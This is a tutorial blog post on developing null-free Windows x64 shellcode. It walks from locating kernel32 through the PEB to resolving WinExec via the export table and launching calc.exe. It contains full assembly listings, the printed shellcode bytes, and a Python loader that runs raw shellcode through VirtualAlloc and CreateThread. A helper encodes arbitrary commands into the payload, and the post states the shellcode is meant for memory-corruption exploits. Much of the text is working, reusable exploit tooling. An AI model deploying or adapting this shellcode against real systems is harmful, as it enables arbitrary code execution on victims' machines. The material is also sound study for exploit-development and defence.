Windows x64 Shellcode Development

In this article, we’re going to be looking at developing Windows x64 shellcode. The shellcode just aims to execute a command using the WinExec function.

Setting up a Development Environment

The following software will be required.

  • A computer or virtual machine running Windows 11
  • Python 3 64-bit (type python in a command prompt, and it should offer to install it)
  • Python keystone-engine (install with pip install keystone-engine)
  • WinDBG Preview (Available in the Microsoft store)
  • Visual Studio Code

Create a Python file and paste in the code listed below. The code does the following;

  • Uses keystone-engine to compile our assembly instructions.
  • Attaches WinDBG to our Python process, so we can examine the code being executed.
  • Converts the compiled code to opcode, and executes it using VirtualAlloc.
import ctypes, struct
import binascii
import os
import subprocess
from keystone import *

def main():
    SHELLCODE = (
        " start: "
        "   int3;"                       # Breakpoint
        "   nop;"
        "   nop;"
        "   nop;"
    )

    # Initialize engine in 64-Bit mode
    ks = Ks(KS_ARCH_X86, KS_MODE_64)
    instructions, count = ks.asm(SHELLCODE)

    sh = b""
    output = ""
    for opcode in instructions:
        sh += struct.pack("B", opcode)                          # To encode for execution
        output += "\\x{0:02x}".format(int(opcode)).rstrip("\n") # For printable shellcode


    shellcode = bytearray(sh)
    print("Shellcode: " + output )

    print("Attaching debugger to " + str(os.getpid()));
    subprocess.Popen(["WinDbgX", "/g","/p", str(os.getpid())], shell=True)
    input("Press any key to continue...");

    ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_void_p
    ctypes.windll.kernel32.RtlCopyMemory.argtypes = ( ctypes.c_void_p, ctypes.c_void_p, ctypes.c_size_t ) 
    ctypes.windll.kernel32.CreateThread.argtypes = ( ctypes.c_int, ctypes.c_int, ctypes.c_void_p, ctypes.c_int, ctypes.c_int, ctypes.POINTER(ctypes.c_int) ) 

    space = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(shellcode)),ctypes.c_int(0x3000),ctypes.c_int(0x40))
    buff = ( ctypes.c_char * len(shellcode) ).from_buffer_copy( shellcode )
    ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_void_p(space),buff,ctypes.c_int(len(shellcode)))
    handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_void_p(space),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))
    ctypes.windll.kernel32.WaitForSingleObject(handle, -1);

if __name__ == "__main__":
    main()

Required Steps

These tasks need to be carried out for the shellcode to execute.

Locating the Kernel32 Base Address

To do anything useful with our Shellcode, we need to be able to call Windows functions. The majority of this functionality is found in Kernel32.dll. This DLL will be mapped into an applications virtual address space.

By examining the processes Process Environment Block (PEB), we can determine the base address of mapped libraries. This requires traversing into the ProcessEnvironmentBlock>Ldr>InMemoryOrderModuleList data structure.

The exact offsets can be determined using WinDBG. From the below output, we can see the PEB has an offset of 0x60. Ldr is at offset 0x18 from the PEB, and InMemoryOrderModuleList is at offset 0x20. Kernel32 should always be the first item in this list, so we only need to read the start of the list.

0:004> dt nt!_TEB @$teb
ntdll!_TEB
   +0x000 NtTib            : _NT_TIB
   +0x038 EnvironmentPointer : (null) 
   +0x040 ClientId         : _CLIENT_ID
   +0x050 ActiveRpcHandle  : (null) 
   +0x058 ThreadLocalStoragePointer : 0x0000014e`24825aa0 Void
   +0x060 ProcessEnvironmentBlock : 0x00000004`1a630000 _PEB
<SNIP>
0:004> dx -r1 ((ntdll!_PEB *)0x41a630000)
((ntdll!_PEB *)0x41a630000)                 : 0x41a630000 [Type: _PEB *]
    [+0x000] InheritedAddressSpace : 0x0 [Type: unsigned char]
    [+0x001] ReadImageFileExecOptions : 0x0 [Type: unsigned char]
    [+0x002] BeingDebugged    : 0x1 [Type: unsigned char]
    [+0x003] BitField         : 0x84 [Type: unsigned char]
    [+0x003 ( 0: 0)] ImageUsesLargePages : 0x0 [Type: unsigned char]
    [+0x003 ( 1: 1)] IsProtectedProcess : 0x0 [Type: unsigned char]
    [+0x003 ( 2: 2)] IsImageDynamicallyRelocated : 0x1 [Type: unsigned char]
    [+0x003 ( 3: 3)] SkipPatchingUser32Forwarders : 0x0 [Type: unsigned char]
    [+0x003 ( 4: 4)] IsPackagedProcess : 0x0 [Type: unsigned char]
    [+0x003 ( 5: 5)] IsAppContainer   : 0x0 [Type: unsigned char]
    [+0x003 ( 6: 6)] IsProtectedProcessLight : 0x0 [Type: unsigned char]
    [+0x003 ( 7: 7)] IsLongPathAwareProcess : 0x1 [Type: unsigned char]
    [+0x004] Padding0         [Type: unsigned char [4]]
    [+0x008] Mutant           : 0xffffffffffffffff [Type: void *]
    [+0x010] ImageBaseAddress : 0x7ff715e00000 [Type: void *]
    [+0x018] Ldr              : 0x7ffb6483c4c0 [Type: _PEB_LDR_DATA *]
<SNIP>
0:004> dx -r1 ((ntdll!_PEB_LDR_DATA *)0x7ffb6483c4c0)
((ntdll!_PEB_LDR_DATA *)0x7ffb6483c4c0)                 : 0x7ffb6483c4c0 [Type: _PEB_LDR_DATA *]
    [+0x000] Length           : 0x58 [Type: unsigned long]
    [+0x004] Initialized      : 0x1 [Type: unsigned char]
    [+0x008] SsHandle         : 0x0 [Type: void *]
    [+0x010] InLoadOrderModuleList [Type: _LIST_ENTRY]
    [+0x020] InMemoryOrderModuleList [Type: _LIST_ENTRY]
<SNIP>

The assembly code below will perform the above traversal, and place the Kernel32 base address in the RBX and R8 registers.

        " start: "
        "  sub rsp, 0x208;"                 # Make some room on the stack

        " locate_kernel32:"
        "   xor rcx, rcx;"                  # Zero RCX contents
        "   mov rax, gs:[rcx + 0x60];"      # 0x060 ProcessEnvironmentBlock to RAX.
        "   mov rax, [rax + 0x18];"         # 0x18  ProcessEnvironmentBlock.Ldr Offset
        "   mov rsi, [rax + 0x20];"         # 0x20 Offset = ProcessEnvironmentBlock.Ldr.InMemoryOrderModuleList
        "   lodsq;"                         # Load qword at address (R)SI into RAX (ProcessEnvironmentBlock.Ldr.InMemoryOrderModuleList)
        "   xchg rax, rsi;"                 # Swap RAX,RSI
        "   lodsq;"                         # Load qword at address (R)SI into RAX
        "   mov rbx, [rax + 0x20] ;"        # RBX = Kernel32 base address
        "   mov r8, rbx; "                  # Copy Kernel32 base address to R8 register

Parsing the Kernel32 Export Address Table

So, we know the base address of Kernel32. Next, we need to determine the addresses of functions we want to call. We can do this by parsing the DLL’s Export Address Table that lists the functions it provides. Below shows the data structure being represented.

    public struct IMAGE_EXPORT_DIRECTORY
    {
        public UInt32 Characteristics;
        public UInt32 TimeDateStamp;
        public UInt16 MajorVersion;
        public UInt16 MinorVersion;
        public UInt32 Name;
        public UInt32 Base;
        public UInt32 NumberOfFunctions;
        public UInt32 NumberOfNames;          // Stores the total number of functions
        public UInt32 AddressOfFunctions;     // Stores RVA of function address location
        public UInt32 AddressOfNames;         // Stores RVA of the function names
        public UInt32 AddressOfNameOrdinals;  // RVA from base of image
    }

We can find the location of the Export Address Table by first determining the offset to the PE signature. This always exists at offset 0x03c from the base address of the executable.

dt -n _IMAGE_DOS_HEADER
ntdll!_IMAGE_DOS_HEADER
<snip>
   +0x03c e_lfanew         : Int4B

We can examine the Export Address Table using WinDBG. The following shows the curent base address.

0:004> !dh kernel32 -f

File Type: DLL
FILE HEADER VALUES
    8664 machine (X64)
       7 number of sections
<SNIP>
    4160  DLL characteristics
            High entropy VA supported
            Dynamic base
            NX compatible
            Guard
   9A2E0 [    DF0C] address [size] of Export Directory
 <SNIP>

Viewing the contents of the export table with the display type (dt) command shows the offsets we’re interested in. .symopt+0x100 is used to make sure the debugging symbols are loaded.

0:004> .symopt
0:004> .symopt-0x100
0:004> dt _IMAGE_EXPORT_DIRECTORY kernel32+9A2E0
ole32!_IMAGE_EXPORT_DIRECTORY
   +0x000 Characteristics  : 0
   +0x004 TimeDateStamp    : 0x73bb7c6b
   +0x008 MajorVersion     : 0
   +0x00a MinorVersion     : 0
   +0x00c Name             : 0x9e2d2
   +0x010 Base             : 1
   +0x014 NumberOfFunctions : 0x661
   +0x018 NumberOfNames    : 0x661
   +0x01c AddressOfFunctions : 0x9a308
   +0x020 AddressOfNames   : 0x9bc8c
   +0x024 AddressOfNameOrdinals : 0x9d610

Dumping the first Name entry shows we’re dealing with the right DLL.

0:004> da kernel32+0x9e2d2
00007ffb`62f2e2d2  "KERNEL32.dll"

Dumping the AddressOfNames RVA provides us with names of the exported functions:

0:004> dd kernel32+0x9bc8c
00007ffb`62f2bc8c  0009e2df 0009e318 0009e34b 0009e35a
00007ffb`62f2bc9c  0009e36f 0009e378 0009e381 0009e392
00007ffb`62f2bcac  0009e3a3 0009e3e8 0009e40e 0009e42d
00007ffb`62f2bcbc  0009e44c 0009e459 0009e46c 0009e484
00007ffb`62f2bccc  0009e49f 0009e4b4 0009e4d1 0009e510
00007ffb`62f2bcdc  0009e551 0009e564 0009e571 0009e58b
00007ffb`62f2bcec  0009e5a9 0009e5e0 0009e625 0009e670
00007ffb`62f2bcfc  0009e6cb 0009e720 0009e773 0009e7c8

0:004> da kernel32+0009e2df
00007ffb`62f2e2df  "AcquireSRWLockExclusive"
0:004> da kernel32+0009e318
00007ffb`62f2e318  "AcquireSRWLockShared"

Below shows how the offsets can be followed to find the NumberOfFunctions exported.

# Get RVA for PE32 Signature
0:008> dd kernel32+0x3c L1
00007ffe`a377003c  000000f8

# Get base address of Export Address Table
dd kernel32+0xf8+0x88 L1
00007ffe`a3770180  000980a0

# Get NumberOfFunctions (offset 0x14)
0:008> dd kernel32+0xf8+0x88+0x14 L1
00007ffe`a3770194  00000520

# We have 1312 export functions in Kernel32...
0:008> ?520
Evaluate expression: 1312 = 00000000`00000520

We can implement similar logic in WinDBG to determine the offsets.

       # Code for parsing Export Address Table
        "   mov ebx, [rbx+0x3C]; "          # Get Kernel32 PE Signature (offset 0x3C) into EBX
        "   add rbx, r8; "                  # Add defrerenced signature offset to kernel32 base. Store in RBX.
        "   mov edx, [rbx+0x88];"           # Offset from PE32 Signature to Export Address Table
        "   add rdx, r8;"                   # RDX = kernel32.dll + RVA ExportTable = ExportTable Address
        "   mov r10d, [rdx+0x14];"          # Number of functions
        "   xor r11, r11;"                  # Zero R11 before use
        "   mov r11d, [rdx+0x20];"          # AddressOfNames RVA
        "   add r11, r8;"                   # AddressOfNames VMA

Lookup the WinExec Function Name

Next, we just need to loop over the AddressOfNames list. We know the length of the list based on the NumberOfFunctions field. Once we have found the function we are looking for we store it’s index in RCX and continue execution.

        # Loop over Export Address Table to find WinExec name
        "   mov rcx, r10;"                  # Set loop counter
        "kernel32findfunction: "
        " jecxz FunctionNameFound;"         # Loop around this function until we find WinExec
        "   xor ebx,ebx;"                   # Zero EBX for use
        "   mov ebx, [r11+4+rcx*4];"        # EBX = RVA for first AddressOfName
        "   add rbx, r8;"                   # RBX = Function name VMA
        "   dec rcx;"                       # Decrement our loop by one
        "   mov rax, 0x00636578456E6957;"   # WinExec          
        "   cmp [rbx], rax;"                # Check if we found WinExec
        "   jnz kernel32findfunction;"

        "FunctionNameFound: "
        "  nop;"

Finding the WinExec Address

The position we found the function name in the list will remain stored in the RCX register. Next, we lookup the function ordinal based on this index. An ordinal is just the identifier for a function within a DLL. We could have performed a lookup based on this, rather than the function name. However, this value could change in future DLL releases.

        "FunctionNameFound: "
        # We found our target
        "   xor r11, r11;"
        "   mov r11d, [rdx+0x24];"          # AddressOfNameOrdinals RVA
        "   add r11, r8;"                   # AddressOfNameOrdinals VMA
        # Get the function ordinal from AddressOfNameOrdinals
        "   inc rcx;"
        "   mov r13w, [r11+rcx*2];"         # AddressOfNameOrdinals + Counter. RCX = counter

With the function ordinal value, we can finally lookup the WinExec address from AddressOfFunctions.

        # Get function address from AddressOfFunctions
        "   xor r11, r11;"
        "   mov r11d, [rdx+0x1c];"          # AddressOfFunctions RVA
        "   add r11, r8;"                   # AddressOfFunctions VMA in R11. Kernel32+RVA for addressoffunctions
        "   mov eax, [r11+4+r13*4];"        # Get the function RVA.
        "   add rax, r8;"                   # Add base address to function RVA
        "   mov r14, rax;"

Call WinExec

Now, with the function address stored in the R14 register, we can call WinExec. The function is pretty simple to call. Below is the method signature.

UINT WinExec(
  [in] LPCSTR lpCmdLine,
  [in] UINT   uCmdShow
);

With 64-Bit code, the first four function parameters are stored in registers rather than on the stack (RCX, RDX, R8 and R9 specifically). In this instance, we will only need to set RDX to a pointer of the command we want to execute, and set RDX (uCmdShow) to 1 so our new window is visible.

       # WinExec Call
        "  xor rax, rax;"                   # Zero RAX to become a null byte
        "  push rax;"                       # Push the null byte to the stack
        "  mov rax, 0x6578652E636C6163;"    # Add calc.exe string to RAX.
        "  push rax;"                       # Push RAX to stack
        "  mov rcx, rsp;"                   # Move a pointer to calc.exe into RCX.
        "  xor rdx,rdx;"                    # Zero RDX   
        "  inc rdx;"                        # RDX set to 1 = uCmdShow
        "  sub rsp, 0x20;"                  # Make some room on the stack so it's not clobbered by WinExec
        "  call r14;"                       # Call WinExec

Executing the code should now run calc.exe, and our shellcode will be output on the command line.

PS C:\Users\user\Desktop> python .\shellcode.py
Shellcode: \x48\x81\xec\x08\x02\x00\x00\x48\x31\xc9\x65\x48\x8b\x41\x60\x48\x8b\x40\x18\x48\x8b\x70\x20\x48\xad\x48\x96\x48\xad\x48\x8b\x58\x20\x49\x89\xd8\x8b\x5b\x3c\x4c\x01\xc3\x8b\x93\x88\x00\x00\x00\x4c\x01\xc2\x44\x8b\x52\x14\x4d\x31\xdb\x44\x8b\x5a\x20\x4d\x01\xc3\x4c\x89\xd1\x67\xe3\x1c\x31\xdb\x41\x8b\x5c\x8b\x04\x4c\x01\xc3\x48\xff\xc9\x48\xb8\x57\x69\x6e\x45\x78\x65\x63\x00\x48\x39\x03\x75\xe1\x4d\x31\xdb\x44\x8b\x5a\x24\x4d\x01\xc3\x48\xff\xc1\x66\x45\x8b\x2c\x4b\x4d\x31\xdb\x44\x8b\x5a\x1c\x4d\x01\xc3\x43\x8b\x44\xab\x04\x4c\x01\xc0\x49\x89\xc6\x48\x31\xc0\x50\x48\xb8\x63\x61\x6c\x63\x2e\x65\x78\x65\x50\x48\x89\xe1\x48\x31\xd2\x48\xff\xc2\x48\x83\xec\x20\x41\xff\xd6
Bytes: 169
Attaching debugger to 9540
Press any key to continue...

Removing Null Bytes

The above Shellcode includes null bytes (0x00), which will prevent it from being used in most memory corruption exploits. Let’s fix that.

The first problematic instruction is sub rsp:

48 81 ec 08 02 00 00 sub rsp,0x208

To avoid this, we can add a negative value to rsp.

0:008> ? 0 - 0x208
Evaluate expression: -520 = ffffffff`fffffdf8

Our resulting null free instruction being;

add rsp, 0xfffffffffffffdf8;

The next issue is the following instruction.

8b 93 88 00 00 00       mov    edx,DWORD PTR [rbx+0x88]

To remove the null bytes, we can send a larger value than necessary, then perform a bit shift operation to remove the unnecessary characters.

0:008> ? 0x88FFFFF >> 0x14
Evaluate expression: 136 = 00000000`00000088

"   xor r12,r12;"
"   add r12, 0x88FFFFF;"
"   shr r12, 0x14;"
"   mov edx, [rbx+r12];"

The final problematic instruction is our WinExec string with a null terminator.

63: 48 b8 57 69 6e 45 78    movabs rax,0x636578456e6957
6a: 65 63 00

Once again, we can use a bit shift operation to address this.

0:009> ? 0x636578456E6957FF >> 8
Evaluate expression: 27977589929699671 = 00636578`456e6957

"   mov rax, 0x636578456E6957FF;"   # WinExec
"   shr rax, 0x8;"

Finished Code Listing

import ctypes, struct
import binascii
import os
import subprocess
from keystone import *

#####################################################################################
# ██████╗░░█████╗░██████╗░██████╗░███████╗██████╗░░██████╗░░█████╗░████████╗███████╗#
# ██╔══██╗██╔══██╗██╔══██╗██╔══██╗██╔════╝██╔══██╗██╔════╝░██╔══██╗╚══██╔══╝██╔════╝#
# ██████╦╝██║░░██║██████╔╝██║░░██║█████╗░░██████╔╝██║░░██╗░███████║░░░██║░░░█████╗░░#
# ██╔══██╗██║░░██║██╔══██╗██║░░██║██╔══╝░░██╔══██╗██║░░╚██╗██╔══██║░░░██║░░░██╔══╝░░#
# ██████╦╝╚█████╔╝██║░░██║██████╔╝███████╗██║░░██║╚██████╔╝██║░░██║░░░██║░░░███████╗#
# ╚═════╝░░╚════╝░╚═╝░░╚═╝╚═════╝░╚══════╝╚═╝░░╚═╝░╚═════╝░╚═╝░░╚═╝░░░╚═╝░░░╚══════╝#
#####################################################################################
#                                                                                   #
#                        x64 Null Free WinExec Shellcode                            #
#####################################################################################

def main():
    SHELLCODE = (
        " start: "
        #" int3;"
        #"  sub rsp, 0x208;"                # Make some room on the stack (NULL BYTE)
        "  add rsp, 0xfffffffffffffdf8;"    # Avoid Null Byte
        " locate_kernel32:"
        "   xor rcx, rcx;"                  # Zero RCX contents
        "   mov rax, gs:[rcx + 0x60];"      # 0x060 ProcessEnvironmentBlock to RAX.
        "   mov rax, [rax + 0x18];"         # 0x18  ProcessEnvironmentBlock.Ldr Offset
        "   mov rsi, [rax + 0x20];"         # 0x20 Offset = ProcessEnvironmentBlock.Ldr.InMemoryOrderModuleList
        "   lodsq;"                         # Load qword at address (R)SI into RAX (ProcessEnvironmentBlock.Ldr.InMemoryOrderModuleList)
        "   xchg rax, rsi;"                 # Swap RAX,RSI
        "   lodsq;"                         # Load qword at address (R)SI into RAX
        "   mov rbx, [rax + 0x20] ;"        # RBX = Kernel32 base address
        "   mov r8, rbx; "                  # Copy Kernel32 base address to R8 register

       # Code for parsing Export Address Table
        "   mov ebx, [rbx+0x3C]; "          # Get Kernel32 PE Signature (offset 0x3C) into EBX
        "   add rbx, r8; "                  # Add defrerenced signature offset to kernel32 base. Store in RBX.
       # "   mov edx, [rbx+0x88];"          # Offset from PE32 Signature to Export Address Table (NULL BYTE)
        "   xor r12,r12;"
        "   add r12, 0x88FFFFF;"
        "   shr r12, 0x14;"
        "   mov edx, [rbx+r12];"            # Offset from PE32 Signature to Export Address Table
        
        "   add rdx, r8;"                   # RDX = kernel32.dll + RVA ExportTable = ExportTable Address
        "   mov r10d, [rdx+0x14];"          # Number of functions
        "   xor r11, r11;"                  # Zero R11 before use
        "   mov r11d, [rdx+0x20];"          # AddressOfNames RVA
        "   add r11, r8;"                   # AddressOfNames VMA

        # Loop over Export Address Table to find WinExec name
        "   mov rcx, r10;"                  # Set loop counter
        "kernel32findfunction: "
        " jecxz FunctionNameFound;"         # Loop around this function until we find WinExec
        "   xor ebx,ebx;"                   # Zero EBX for use
        "   mov ebx, [r11+4+rcx*4];"        # EBX = RVA for first AddressOfName
        "   add rbx, r8;"                   # RBX = Function name VMA
        "   dec rcx;"                       # Decrement our loop by one
      # "   mov rax, 0x00636578456E6957;"   # WinExec (NULL BYTE)      
        "   mov rax, 0x636578456E6957FF;"   # WinExec
        "   shr rax, 0x8;"
        "   cmp [rbx], rax;"                # Check if we found WinExec
        "   jnz kernel32findfunction;"

        "FunctionNameFound: "
        # We found our target
        "   xor r11, r11;"
        "   mov r11d, [rdx+0x24];"          # AddressOfNameOrdinals RVA
        "   add r11, r8;"                   # AddressOfNameOrdinals VMA
        # Get the function ordinal from AddressOfNameOrdinals
        "   inc rcx;"
        "   mov r13w, [r11+rcx*2];"         # AddressOfNameOrdinals + Counter. RCX = counter
        # Get function address from AddressOfFunctions
        "   xor r11, r11;"
        "   mov r11d, [rdx+0x1c];"          # AddressOfFunctions RVA
        "   add r11, r8;"                   # AddressOfFunctions VMA in R11. Kernel32+RVA for addressoffunctions
        "   mov eax, [r11+4+r13*4];"        # Get the function RVA.
        "   add rax, r8;"                   # Add base address to function RVA
        "   mov r14, rax;"

       # WinExec Call
        "  xor rax, rax;"                   # Zero RAX to become a null byte
        "  push rax;"                       # Push the null byte to the stack
        "  mov rax, 0x6578652E636C6163;"    # Add calc.exe string to RAX.
        "  push rax;"                       # Push RAX to stack
        "  mov rcx, rsp;"                   # Move a pointer to calc.exe into RCX.
        "  xor rdx,rdx;"                    # Zero RDX   
        "  inc rdx;"                        # RDX set to 1 = uCmdShow
        "  sub rsp, 0x20;"                  # Make some room on the stack so it's not clobbered by WinExec
        "  call r14;"                       # Call WinExec

    )

    # Initialize engine in 64-Bit mode
    ks = Ks(KS_ARCH_X86, KS_MODE_64)
    instructions, count = ks.asm(SHELLCODE)

    sh = b""
    output = ""
    for opcode in instructions:
        sh += struct.pack("B", opcode)                          # To encode for execution
        output += "\\x{0:02x}".format(int(opcode)).rstrip("\n") # For printable shellcode


    shellcode = bytearray(sh)
    print("Shellcode: "  + output )
    print("Bytes: " + str(len(sh)))
    print("Attaching debugger to " + str(os.getpid()));
    subprocess.Popen(["WinDbgX", "/g","/p", str(os.getpid())], shell=True)
    input("Press any key to continue...");

    ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_void_p
    ctypes.windll.kernel32.RtlCopyMemory.argtypes = ( ctypes.c_void_p, ctypes.c_void_p, ctypes.c_size_t ) 
    ctypes.windll.kernel32.CreateThread.argtypes = ( ctypes.c_int, ctypes.c_int, ctypes.c_void_p, ctypes.c_int, ctypes.c_int, ctypes.POINTER(ctypes.c_int) ) 

    space = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(shellcode)),ctypes.c_int(0x3000),ctypes.c_int(0x40))
    buff = ( ctypes.c_char * len(shellcode) ).from_buffer_copy( shellcode )
    ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_void_p(space),buff,ctypes.c_int(len(shellcode)))
    handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_void_p(space),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))
    ctypes.windll.kernel32.WaitForSingleObject(handle, -1);

if __name__ == "__main__":
    main()

Variable Length Command Input

Another improvement can be made is supporting executing commands of variable length, rather than having to manually encode commands. This can be implemented by replacing the calc.exe instructions with a function call…

       # "  xor rax, rax;"                  # Zero RAX to become a null byte
       # "  push rax;"                      # Push the null byte to the stack
       # "  mov rax, 0x6578652E636C6163;"   # Add calc.exe string to RAX.
       # "  push rax;"                      # Push RAX to stack
        "" +  str(command("explorer.exe https://www.bordergate.co.uk")) + ""
        "  mov rcx, rsp;"                   # Move a pointer to calc.exe into RCX.
        "  xor rdx,rdx;"                    # Zero RDX   
        "  inc rdx;"                        # RDX set to 1 = uCmdShow
        "  sub rsp, 0x20;"                  # Make some room on the stack so it's not clobbered by WinExec
        "  call r14;"                       # Call WinExec

Then adding the following Python functions.

def encodeCommand(command):
    # Pad commands
    command = command.ljust(8, ' ')
    # Convert ASCII characters to bytes
    result = "".join("{:02x}".format(ord(c)) for c in command)
    # Reverse the bytes for little endian formatting
    ba = bytearray.fromhex(result)
    ba.reverse()
    ba.hex()
    return("0x" + ba.hex())

def command(command):
    # Split command into 8 byte chunks
    size = 8
    chunks = [command[i:i+size] for i in range(0, len(command), size)]

    output = ""

    # Hack to account for uneven amount of data
    if (len(chunks) % 2 != 0):
       output += "mov rax, " + encodeCommand("        ") + "; "
       output += "push rax; "

    for i in reversed(chunks):
        print(i)
        output += "mov rax, " + encodeCommand(i) + "; "
        output += "push rax; "

    return output

Closing Thoughts

This is fairly basic x64 shellcode. A few things to think about;

  • The target application will crash after executing our command. Cleanly exiting the application would require another function lookup, increasing the size of the code.
  • Having a general purpose function to lookup multiple functions would be beneficial for more complex shellcode.